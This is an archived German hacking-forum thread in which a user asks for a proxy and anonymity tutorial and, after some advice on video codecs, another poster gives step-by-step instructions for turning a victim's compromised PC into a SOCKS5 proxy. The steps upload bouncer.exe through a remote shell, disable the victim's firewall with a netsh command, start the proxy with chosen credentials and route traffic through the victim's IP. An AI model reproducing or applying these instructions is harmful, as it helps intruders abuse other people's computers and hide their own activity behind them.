PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [S] Anonymität & Proxies Tutorial



dattj
17.09.2010, 14:37
Hi,

ja ich weiß es gibt noch Tutorials in der Section aber die funkten bei mir irgendwie nicht. Ich kann die Videos irgendwie nicht abspielen und da wollte ich einen bitte mir ein gutes Tutorial zu geben. z.B. wie man 5 socks erstellen kann.
Aber bitte alles in einen. Wäre nett wenn mir einer ein gutes Tut geben kann. Und bitte keine unnötige Post da ich mich dann an ein MOD wende und die Post wieder deaktiviert. Also bitte nur hilfreiche Tuts.

MFG Dattj

DaPolo
17.09.2010, 14:38
Wenn du die Videos nicht abspielen kannst, fehlt dir warscheinlich das hier: Video Codecs - Downloads - TechSmith Corporations (http://www.techsmith.de/download/codecs.asp)

dattj
17.09.2010, 14:41
Ne also die Fehlermeldung kommt von Divix und ich habe mir alles nötige wieder neu gedownloadet und es kommt immer. Ich weiß nicht mehr wie die Fehlermeldung war weil ich die Videos wieder geschlöscht habe.

Sveiven
17.09.2010, 14:51
Also, du willst Socks5 benutzen ne?

Willst du wissen, wie man das auf deinem PC einstellt oder wie man es bei einem 'Opfer' aufsetzt, dami du den benutzen kannst?

CaptainCrunch
17.09.2010, 15:35
Versuch mal den Vlc Mediaplayer der spielt so ziemlich Alles ab;D

VLC media player - Download - CHIP Online (http://www.chip.de/downloads/VLC-media-player_13005928.html)

dattj
17.09.2010, 17:57
Sveiven: Also ich möchte allgemein alles dazu wissen was man braucht

Sveiven
17.09.2010, 18:02
Hier mit setzt du bei einem Opfer Socks5 auf:


Socks5 (bouncer)

-Bouncer.exe |+
Die Bouncer.exe aufjedenfall NICHT auf eurem PC Ausführen!
Und auch nicht beim Vic

Durchführung:
1. Bouncer.exe beim Vic Hochladen in C:
2. Remote Shell öffnen und "Start" klicken.
3. Den Befehl "netsh firewall set opmode disable" eingeben (ohne die ") <- Für Firewall zu Killen
4. cd\ eingeben, Enter Drücken.
5. dir eingeben, Enter Drücken.
Jetzt muss da die Bouncer.exe irgendwo dabei stehn.
6. Den Befehl eingeben " bouncer.exe --port 2000 --socks5 --daemon --s_user DEINWUNSCHNAME --s_password DEINWUNSCHPASSWORT"
auch wieder ohne die " !!
Wenn jetzt "Console Inactive" da steht, ist es Geschaft.
Jetzt einfach die IP Kopieren vom Vic (Rechtsklick auf sein Name und auf "Copy IP" klicken).

Die IP bei z.B Proxiefier eingeben, bei Port "2000" eingeben, Socks5 Ankreutzen, "User Authenthication" anklicken und die Daten eingeben die ihr bei WUNSCHNAME und WUNSCHPASSWORT angegeben habt!

Beispiel:
bouncer.exe --port 2000 --socks5 --daemon --s_user 1234 --s_password xxxx
Dann müsst ihr bei zB Proxiefier bei Username 1234 und bei Passwort xxxx eingeben!

Befehle:

Firewall-Kill: netsh firewall set opmode disable
Socks5: bouncer.exe --port 2000 --socks5 --daemon --s_user DEINWUNSCHNAME --s_password DEINWUNSCHPASSWORT

Die Socks5 sind nur so lange online wie das Vic Online ist, also Aufpassen!



Mit Proxifier kannst du den dann anwenden.